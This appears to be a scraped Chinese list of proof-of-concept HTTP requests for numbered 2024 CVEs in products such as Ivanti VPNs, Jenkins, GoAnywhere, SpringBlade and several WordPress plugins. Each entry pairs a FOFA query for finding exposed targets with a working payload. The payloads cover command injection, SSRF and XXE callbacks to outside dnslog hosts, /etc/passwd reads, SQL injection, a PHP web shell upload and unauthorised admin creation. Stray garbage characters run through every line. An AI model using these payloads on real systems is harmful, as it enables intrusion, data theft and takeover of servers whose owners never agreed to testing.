8 g" x# e8 C. ]/ M2 ^+ R" ]. N5 }
' d4 L6 J: C, }1 B$ B99. Ncast盈可视高清智能录播系统busiFacade RCE
9 k, U e T" \2 k* K9 r. V' a" PCVE-2024-0305
! z% s: S* l: f) |* L, t) f5 pFOFA:app="Ncast-产品" && title=="高清智能录播系统"
" a( s9 d. W2 \" c; t$ o. MPOST /classes/common/busiFacade.php HTTP/1.1
' ^! l0 z5 ~# R1 G* B" y) e3 z. LHost: 192.168.40.130:8080
p8 {9 i) Z" ^3 i- qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 g# k _5 ]$ a% |. S1 c" \
Connection: close
4 v3 h3 C7 [# D1 RContent-Length: 154/ V9 p: N. X. y: l! e) ~" z- Q
Accept: */*
; _. e0 ~3 l; J$ q0 c% r4 qAccept-Encoding: gzip, deflate
$ n! r6 `* [! q& TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ I% e( W% @" |9 V7 y9 q2 k; [( d Z
Content-Type: application/x-www-form-urlencoded; charset=UTF-8' Y# _: V4 o$ S% m1 x3 K+ C+ d
X-Requested-With: XMLHttpRequest
8 [6 f5 `1 _+ L
! C9 T! [5 |3 v. Z1 A%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D4 _8 k# V& \3 G6 h+ t6 g$ V# k
% f" r6 F3 e) {
6 G+ I" Y; f$ g) k6 T100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
* ?" |# u( m. ~" O4 } X3 V2 u: zCVE-2024-0352
6 W, o% w# H: Q! X9 MFOFA:icon_hash="874152924"
3 X* C. o/ L4 k2 E6 n$ VPOST /api/file/formimage HTTP/1.1. a% G7 [: m0 s6 @3 \
Host: 192.168.40.130
8 _6 u: y* `6 k* j- ~( O2 P/ gUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36- h& j- V+ B K4 b, W
Connection: close
2 H. _( g& R6 x! m- L. BContent-Length: 201
0 q2 K! U( ]' d3 x6 i4 n( t# RContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
; I; _5 w( b; } _ J. nAccept-Encoding: gzip
5 ~- N3 a3 H5 @8 }8 v2 M/ I8 a. J+ X) \6 }
------WebKitFormBoundarygcflwtei
3 P% P. M. {" Q1 H( ]! U/ I7 CContent-Disposition: form-data; name="file";filename="IE4MGP.php"3 o3 p6 g1 b1 P1 P8 U; \, W
Content-Type: application/x-php
+ b+ Q+ _/ e7 D h, I5 B& p3 h+ M& f' w/ |% J7 ^
2ayyhRXiAsKXL8olvF5s4qqyI2O0 Q: U$ r: r3 B* D9 ?% n8 ] s
------WebKitFormBoundarygcflwtei--# w3 ?) |7 W' P- S' u
1 R) g7 b, g2 D+ U3 ], [9 ?
C4 }3 j0 ]. H7 l( ?
101. ivanti policy secure-22.6命令注入- o4 z+ U6 m; |- y8 V
CVE-2024-21887
1 p z* Y4 c- WFOFA:body="welcome.cgi?p=logo"
# y) a5 h+ X( ^GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1, J9 w. L9 W. E6 v6 g5 r
Host: x.x.x.xx.x.x.x
; m+ G0 g$ E! D6 m6 W4 a( @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 ^7 \5 k( q c8 N6 M) S
Connection: close7 Y2 K8 \' h3 T) A
Accept-Encoding: gzip; \) Q8 q$ v0 j- J# [) L
, R8 H2 q! e( s
) K# T: _2 f: V% j102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行7 s9 D9 d' I. |! i" q- _1 y
CVE-2024-21893
0 r ~" ?5 ~8 A2 ]5 [FOFA:body="welcome.cgi?p=logo") z; [4 w3 s) B1 g5 }; a5 B$ n
POST /dana-ws/saml20.ws HTTP/1.14 r2 }! B7 z# z$ u# W. V
Host: x.x.x.x
9 B3 F V4 e! ]+ [4 |& gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 Q; J+ f" q+ x6 H2 w
Connection: close
) b: Z5 q& j7 z( pContent-Length: 792
& b/ `: T! y3 w6 wAccept-Encoding: gzip
* m' @& u$ p" H& ~: {. s# ]' ?
& H! S$ H) f# b' b) d; S$ e2 [5 t+ I<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>! s8 K' @) y. f: P {2 ~8 y1 A
6 n2 ?, I% Q! O# Y7 V$ C
103. Ivanti Pulse Connect Secure VPN XXE
+ p+ T \ v! X9 M3 ^ KCVE-2024-22024
@. L9 X2 p- y; a6 rFOFA:body="welcome.cgi?p=logo"
. }- P1 X# ]. d( z" G1 p- HPOST /dana-na/auth/saml-sso.cgi HTTP/1.1( @6 E. L- s' V
Host: 192.168.40.130:111
% z, j6 S6 |; U( EUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
% ?# ~% \, y7 k7 _/ u T/ TConnection: close* G" R6 P6 u3 M3 T/ i, t
Content-Length: 204
/ k) a! r9 d% F( }4 h: |Content-Type: application/x-www-form-urlencoded
& H6 Y$ _6 q. M# p/ tAccept-Encoding: gzip( O/ f& ~. p0 P! c3 K
: m6 f7 H( `+ K% X+ z" [% ^SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
, E4 k' T. a# w; j0 N6 ~+ |4 \5 M* q( ]7 f! z
2 ~! e3 W" S \! K
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
- i5 L) g% A0 J$ [, u! t<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>& `2 A. o" W/ n% k$ [
0 h! b3 ?) V% m8 w5 p
# E% h/ O; O4 _: F" H0 [2 x. V( ~104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露$ d/ J1 [1 T# y9 l. K$ j. H
CVE-2024-0569
) g6 _) P9 I* D, x# pFOFA:title="TOTOLINK"
! L+ a9 Z( t2 `; y3 {/ g% y6 wPOST /cgi-bin/cstecgi.cgi HTTP/1.15 P" g( r( o L3 e6 x V
Host:192.168.0.1
+ g( _; M. a6 j$ k$ QContent-Length:41
$ Y0 `7 w9 l& q9 w# vAccept:application/json,text/javascript,*/*;q=0.01
2 w, k E' p& E* S/ [: a; ?X-Requested-with: XMLHttpRequest8 s% y- V3 @/ }) B# C1 I
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
+ j) s8 h. j$ r! J4 o" HContent-Type: application/x-www-form-urlencoded:charset=UTF-8
/ i2 {8 t0 s9 V( HOrigin: http://192.168.0.1
/ j, M1 d$ D% ~2 B/ c$ N: OReferer: http://192.168.0.1/advance/index.html?time=16711523805643 N( { O2 m X& I5 r# ^
Accept-Encoding:gzip,deflate
/ }! E0 @3 X- ~5 Q3 ^5 o8 U' HAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
+ r9 b( D. Y% Y: _+ J3 a! RConnection:close6 n% g% t' W3 I4 n, x
0 |. L0 K/ X7 n8 T. b
{- M1 M, E5 o8 M
"topicurl":"getSysStatusCfg",2 d2 I6 Q4 Y5 n! s- z# F
"token":""( p4 R& c6 B' @3 r6 D' V
}
+ x$ y) q! d4 v! {% F, B: e; X. r. R2 t* K
105. SpringBlade v3.2.0 export-user SQL 注入
) \0 _1 z6 j8 e- X f; nFOFA:body="https://bladex.vip"8 N9 e# W- O) |" i% I2 [
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
, _0 I( f7 F) ^5 o" J: k
q: Q7 D: j K) l/ ^4 o5 Q8 A106. SpringBlade dict-biz/list SQL 注入8 d3 {, N. A9 k
FOFA:body="Saber 将不能正常工作"
0 w! T& A1 l9 v, y4 L8 cGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
) Q0 O1 d' m: l5 A! h# |Host: your-ip; t" W( L* u* W) v; k3 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; d/ G C$ ?3 X2 A Q
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A8 O. @5 {: x9 P( P( n3 L
Accept-Encoding: gzip, deflate
' J* B! v: R7 z. \) `& ~* nAccept-Language: zh-CN,zh;q=0.9+ C2 [ q/ q' x* v# B
Connection: close
4 d* y! Q8 w& x8 j# \0 ?, n8 f, B! v$ f; R0 D: N: A7 @
. \3 _/ C6 l9 y5 B1 k9 w( m6 V& v5 z107. SpringBlade tenant/list SQL 注入
; }1 E; G/ d7 i& K! d8 S5 `3 F NFOFA:body="https://bladex.vip": C5 H2 z# ?2 S! J' {! m' C
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
7 v% n0 o3 W3 b% ^+ w) X7 wHost: your-ip
0 n& O% X$ O" z' OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& \) f* v/ `6 K( E
Blade-Auth:替换为自己的
( Z" _6 H" [+ @3 d5 @Connection: close5 y3 V3 d8 M9 o8 f+ q8 g* u" O5 e
! w7 F4 h) Y$ D& L. _$ K
2 c5 \. f! ~: y' Z
108. D-Tale 3.9.0 SSRF& o1 ^4 x' w7 w0 |
CVE-2024-21642
. T+ k0 c. x2 J7 S5 ] SFOFA:"dtale/static/images/favicon.png"$ \: n( {9 }6 n) c( P0 b, {) h. o
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1: [/ Q* H$ f% v9 e8 ~
Host: your-ip
! a7 g4 W6 D* O+ W( Q1 F' D9 i+ Z$ m0 aAccept: application/json, text/plain, */*# S1 t5 T5 Z. h- K* d. a' H# D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 S' O6 e4 ~4 m2 Q% B, X, IAccept-Encoding: gzip, deflate
5 n! Z; w7 V4 m9 WAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
7 F+ m; b( n- `, nConnection: close6 v0 E" _2 f8 ?2 f8 j2 D: j
7 e6 w1 y' _3 u8 U8 I0 Q9 _
9 F) B1 O9 P- W% X
109. Jenkins CLI 任意文件读取
. N. ^4 J! {) i% t1 TCVE-2024-23897
4 p: B3 \& t! h3 M3 XFOFA:header="X-Jenkins"
' q5 Z8 N i }/ SPOST /cli?remoting=false HTTP/1.1% I/ [; H: R3 g, e6 Y3 F$ [9 w
Host:1 f1 g4 w" ]. A9 r, x
Content-type: application/octet-stream
& l" L w+ O; J; x8 b/ |Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
4 `! q, I& G/ a" Z; CSide: upload
1 @# Q% y$ ?- T0 v/ ^: q8 [Connection: keep-alive, @: X6 K9 j& d7 ~0 m
Content-Length: 163. X, |6 `3 h: n! z" F9 B' r
1 k e& M: T( H2 }/ A6 \& I
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'! c: Z1 `1 w# C. q* b2 d
l4 {7 x& |' X5 w3 {
' [9 S) ?) r8 F- v, S) N X8 U3 yPOST /cli?remoting=false HTTP/1.1& H! q. U' j4 o+ V
Host:
/ h- _2 m8 o/ X6 VSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92# k) y4 A p7 M" U" i0 {
download
- ]" J. Q# m8 M6 ] x$ E oContent-Type: application/x-www-form-urlencoded4 E" y) t- A% }# R, O7 |; E
Content-Length: 09 x* Y3 \5 F2 s" `' b9 [
& L0 g' {" f8 c2 U" H
- K: J F: Q: }( A- d$ D% kERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin; j3 {3 t' E2 j6 F5 L" \
java -jar jenkins-cli.jar help
# }/ y$ q, R1 D0 M[COMMAND], _) ~+ P! e9 M, g7 i6 k. o
Lists all the available commands or a detailed description of single command.2 K; ] @. T& G! }8 v: b6 \' U
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)! S3 P0 @; p B8 t" S
+ R. v5 z% t" T% A! h5 G( p
3 E! \% Q7 A" F3 c' a110. Goanywhere MFT 未授权创建管理员% k8 X7 ]! E. G( c
CVE-2024-0204
& [; h6 @' C2 Q2 m, Z4 T; H8 s0 o( SFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"# W: p3 j! V1 ]) v
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
- L. v0 c6 O6 uHost: 192.168.40.130:8000+ M* J# j ?+ m5 I$ B: c5 p
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.364 O8 |8 S) x- ]# V8 r3 o$ O. C
Connection: close$ m" D9 \+ h; N9 C7 e4 W! Z" i
Accept: */*3 t- @: {; c, p3 m- L. g
Accept-Language: en! K) Z$ e9 D! @1 Z- G) |7 O
Accept-Encoding: gzip
4 ?3 O5 R! _- q: ]4 d( e( J
8 L( ^( S, r, X" ?$ e! n/ y6 x. b8 [ [* g/ P5 J" F0 Z5 O! @& E
111. WordPress Plugin HTML5 Video Player SQL注入
* f+ V3 n! q7 p& P# U `! y5 ICVE-2024-1061
: O+ ~6 ^; I& i Y& HFOFA:"wordpress" && body="html5-video-player"
6 Y" k( q& q. c: q4 V ]2 G MGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.11 H1 L/ y) t4 p; m7 } C, X$ T
Host: 192.168.40.130:112
- X, Q m/ r; W! fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 R8 M5 U; s l I- j& b
Connection: close) b! d0 t' D! v1 J$ \* Y* c
Accept: */*
0 W( q" _, g* y2 c" p6 m, m3 PAccept-Language: en: T0 s4 G* @% f, j
Accept-Encoding: gzip
- p: T: g0 v, L6 @% N8 R8 |5 N1 L& h/ {; i6 j" ~* ?9 ]
% V. e6 Q1 `; \, X4 p) e112. WordPress Plugin NotificationX SQL 注入
; c: E8 x; I& c/ g2 m" z4 ZCVE-2024-1698
* n& a u2 g2 p7 Q6 ]& h1 @1 ~FOFA:body="/wp-content/plugins/notificationx"
: G" P% A! z) yPOST /wp-json/notificationx/v1/analytics HTTP/1.1
" @' m+ W8 h5 ^* fHost: {{Hostname}}+ }3 F# G6 _; f9 h
Content-Type: application/json4 Q* ]7 g7 x0 J/ I5 r/ R
# n K$ h8 A- y9 F
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
. |, ~2 t6 s% m; Z1 ^9 o( d* s) e( R2 }% \5 [
; i* L6 ?( ]: g
113. WordPress Automatic 插件任意文件下载和SSRF
( L3 U" Z Z# G( a5 e0 hCVE-2024-27954% k1 u( n, b% U s" S+ S
FOFA:"/wp-content/plugins/wp-automatic"
% A0 r" ^$ o; v8 QGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
! t7 _. ^+ g5 [' j# pHost: x.x.x.x0 y" E- ?- v2 G) W5 o9 z* A4 U
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
' F1 c0 V5 l2 g0 s' \Connection: close
) W2 l' h8 W/ ]Accept: */** ~$ S' R4 @. y
Accept-Language: en
' S$ }' M+ t m# M0 ^Accept-Encoding: gzip
. }3 F: C' e' |' U0 q( Z- y4 g8 f# \
3 j$ a- O2 s" r5 O+ f
114. WordPress MasterStudy LMS插件 SQL注入6 `( S1 h) ]3 Y/ `
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"9 {5 l0 a' I( S8 a! K( ~
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
$ a' ?) E4 ^. P% @* B. t7 aHost: your-ip
& C3 R9 F) M5 U/ W( [User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! J U- K" ~( i
Accept-Charset: utf-8+ N( m! N; M4 n2 u/ p* t
Accept-Encoding: gzip, deflate7 c, [- l4 x) f9 [# Q
Connection: close
# I9 w( w" U0 t: T0 N. O$ r, B0 e' R; S0 a4 i; R# ~: k& \* F
' K4 f* k: e( u% S# t$ L6 T115. WordPress Bricks Builder <= 1.9.6 RCE& A: N) O a$ @1 z1 t$ N# {7 f
CVE-2024-256009 G# b+ M( e* W. ?- e4 h
FOFA: body="/wp-content/themes/bricks/"
; N( Z5 D. \4 Z5 b7 U* g) i% t第一步,获取网站的nonce值0 X/ P2 F+ d3 q. ~8 P/ Y, W( D
GET / HTTP/1.1! x7 @" w) i/ N; ]% W
Host: x.x.x.x
" }7 J9 g2 n/ `( o, u N/ H2 j5 bUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36& ]/ d* e! s. D9 M: h: e
Connection: close
+ X, p+ u, b. e3 j/ ^2 V hAccept-Encoding: gzip
. R+ J+ O0 ]6 \; o2 t# i& k! C4 ?5 K, }/ I4 e" h! |
1 ^ i' ^8 t* P3 u
第二步替换nonce值,执行命令
% S( t m; a* G. bPOST /wp-json/bricks/v1/render_element HTTP/1.1
4 j7 |0 j0 M$ S8 g( oHost: x.x.x.x* @7 w; T$ D8 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) r3 {' b1 P+ S$ bConnection: close9 B- O% F# ` V/ x6 I7 z9 k& w( L
Content-Length: 356
* D3 {9 P F( y, y5 C. z4 u* XContent-Type: application/json
2 E; q9 L9 z6 j5 f2 PAccept-Encoding: gzip4 U: Q) f+ Y8 X. b% c, Z* M4 `
H2 M# A! S s ~) q1 P{; w7 H+ E& }( f% {
"postId": "1",' t' Q: E3 H& M! |8 G
"nonce": "第一步获得的值",
7 x+ G( |! o. b5 B( J4 L "element": {
8 E1 e5 H- n2 \ "name": "container",. n0 B* v8 o, C; E1 n3 K
"settings": {
8 J6 }6 ]9 ~8 I" F3 c ` "hasLoop": "true",; v3 D! c. M4 k3 X
"query": {
0 [: U0 X: e- W4 \- y) f/ O1 M% ^ "useQueryEditor": true,
" u2 d. i: D2 [: m" o9 P9 Z "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
3 H0 [: D! s2 L1 H: } "objectType": "post"
3 X' _' Y9 W) [" [( k }
$ l4 S: F* p( W7 i9 D, K' ` }+ S! P7 Y E) V; x% C
}3 A6 _+ z3 U9 a+ @, Z
}
m6 L; W. f# q* M7 @8 S& J( u. x- Z) }! S
2 r4 |/ O/ w3 p x* Q1 y; N( s) b
116. wordpress js-support-ticket文件上传
9 H, f9 X6 ]2 e0 ~" R AFOFA:body="wp-content/plugins/js-support-ticket"* U4 [6 ~- a5 G+ f6 |: u/ k
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
( }$ F8 [" u" w! l+ pHost:
" X/ m* U" I& {. bContent-Type: multipart/form-data; boundary=--------7670991715 n# Y0 ]5 |! {% K5 Q- b5 U
User-Agent: Mozilla/5.0
$ M, E c! Y' F; z+ n9 P4 l. `( u2 u
----------767099171
4 H) N/ q9 ?: t6 Q$ n" ?8 Q: ^1 yContent-Disposition: form-data; name="action"4 Y( t' f7 n* A" X
configuration_saveconfiguration
' V, u( F$ X h+ }( p5 g----------767099171
+ D5 Q% y& m% O3 T; pContent-Disposition: form-data; name="form_request"1 x! l6 z( X! q; V' q. g6 Q
jssupportticket Y! a: \2 q3 g
----------767099171
2 g Q+ v- Y, K# W# F1 oContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
! S; a8 V6 u2 \" k# J4 z+ _, h% UContent-Type: image/png* w: \" U" C4 l J' G+ K1 `5 b: t
----------767099171--2 y" r$ ]9 k3 ^# L5 g9 m
) k- X+ ]9 ~7 C. x' ]# f" j, L% n2 g; U4 e) ]6 J3 w7 x
117. WordPress LayerSlider插件SQL注入
' N7 X3 @( f: R9 U* ~version:7.9.11 – 7.10.0
! Q% h5 F! q+ I- z4 b4 t1 wFOFA:body="/wp-content/plugins/LayerSlider/"
1 H! e3 B! j+ Y7 k+ {GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
f0 K* u/ ?0 r9 M/ H, FHost: your-ip
* ~' K5 T2 M$ \8 A4 K/ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ q" |# l2 R' b" G2 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 Y) }0 J4 m0 j! S! @9 X3 _4 s& ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) I+ q" {$ t9 t: V4 i/ |! O' e
Accept-Encoding: gzip, deflate, br. f5 x; r7 m# q5 S+ K7 q* w
Connection: close& \- |& ^7 Y; _2 o+ m4 `2 d
Upgrade-Insecure-Requests: 1
0 B {1 ~+ O& o3 q7 [
) _ U( ~" A$ Q% d8 f! M2 \' m3 t
1 A4 v' _) ^7 g4 Z8 y118. 北京百绰智能S210管理平台uploadfile.php任意文件上传$ D2 a+ l6 E" Z& s* P* j. ]
CVE-2024-0939
$ a8 C/ ] ~% f0 c( T2 e0 EFOFA:title="Smart管理平台"' U; V- a$ D) p
POST /Tool/uploadfile.php? HTTP/1.18 P" e* P) n, E. p" S, b& ?
Host: 192.168.40.130:84439 J$ p5 l8 m! Q; N
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f86 d5 `8 Q7 ]4 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.07 s6 x6 H( e/ X9 d" m: u: r# C5 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 |7 g9 R8 B6 K2 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 |/ f: ~# Q& `$ \& cAccept-Encoding: gzip, deflate
8 r/ p# v9 a9 W+ }Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887( Y: N& x8 p$ q r
Content-Length: 405: C+ x5 e* B3 s; M6 _4 ^. ?" h
Origin: https://192.168.40.130:8443
5 d3 X" K3 _8 u& z+ aReferer: https://192.168.40.130:8443/Tool/uploadfile.php$ d' \1 z) N {7 N, |& L- u6 [
Upgrade-Insecure-Requests: 1; I4 L2 u$ ~# w' g. c& z
Sec-Fetch-Dest: document
6 o6 m/ ?9 k- \, V9 H; b- oSec-Fetch-Mode: navigate e% K/ r5 R% b ]
Sec-Fetch-Site: same-origin
+ y; ]' I" L$ c3 GSec-Fetch-User: ?1
! k- V ?# \7 w& ATe: trailers
v: X6 K. _2 ^( A% ]* YConnection: close
/ B2 P( Q; j& I( H$ R
- Y5 i- a3 _% B; c* h& _2 u) C2 E-----------------------------13979701222747646634037182887
# I) T& s6 y/ gContent-Disposition: form-data; name="file_upload"; filename="contents.php"' x& P1 l* J z c
Content-Type: application/octet-stream* b; ]1 [7 Z% G6 [; ^0 H
0 _. y8 f2 Y1 j
<?php
$ V. k, s; M; ~. q% \7 x) lsystem($_POST["passwd"]);. v9 z4 N, N% ^7 o0 A" J
?>! }; v1 K9 H0 {1 ~8 I
-----------------------------13979701222747646634037182887
. I) q6 [: ]! f: P p6 f( s7 KContent-Disposition: form-data; name="txt_path"# |6 ], v; o" |5 K1 I
0 n; \& I& x, X' P0 i; a. o' X# U1 J- _/home/src.php
. J. T+ O. z" e6 ]8 t-----------------------------13979701222747646634037182887--
$ J; ~& e- H: A+ U \. o; |& _+ o% V% A. P& X! l1 E m
9 n+ q1 v5 a" `6 J: {
访问/home/src.php
: f8 w- R8 P( A% K0 l+ K1 X1 m! D+ @
119. 北京百绰智能S20后台sysmanageajax.php sql注入4 v8 ~0 m" V- J0 r" t
CVE-2024-1254/ q+ V; b- E+ x( Q* i5 B3 `
FOFA:title="Smart管理平台"8 z1 H8 z, W. }# r! o7 F
先登录进入系统,默认账号密码为admin/admin
' H% ]* F9 Q& ^* O* Z# w1 `POST /sysmanage/sysmanageajax.php HTTP/1.11
' Z% l6 o* k, } o- oHost: x.x.x.x3 c# C+ t- X/ ]) g
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
) H1 l; ?" M. A$ U( V' rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.05 I8 j% x8 N) M9 b6 |+ F/ f
Accept: */*
5 L" I1 B! h( p+ I4 \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. r, [7 r+ g1 q9 ^3 M# p" c
Accept-Encoding: gzip, deflate
( p% O" F$ @1 Y# t2 `' o/ {% K& @; ~Content-Type: application/x-www-form-urlencoded;
7 L' K% T9 p6 D' S$ I# OContent-Length: 109
v5 w# o+ [' b6 d2 LOrigin: https://58.18.133.60:8443
0 [0 {! L' b% S+ x' m1 N( C) NReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
8 k6 l% q; Q3 ^0 F6 `" ySec-Fetch-Dest: empty" T( ?- g& D, h5 |7 @3 {
Sec-Fetch-Mode: cors, p3 a1 ^( M6 W" W) e1 O
Sec-Fetch-Site: same-origin% e" \* r0 I5 }* u. M) W# S. y9 J" Y# K
X-Forwarded-For: 1.1.1.1& d. U& X% Q# Q8 d. }
X-Originating-Ip: 1.1.1.1
7 N, Y8 Q: `0 D4 pX-Remote-Ip: 1.1.1.1
& u+ N1 U7 S2 o- v$ oX-Remote-Addr: 1.1.1.1
$ s# P& ^) I/ f$ J$ FTe: trailers
/ s. `9 G8 j/ X: M8 A% LConnection: close
y3 a |: L4 i* i$ J2 q, @: e* i/ F1 j. S# x
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
/ [+ [& _ R4 q
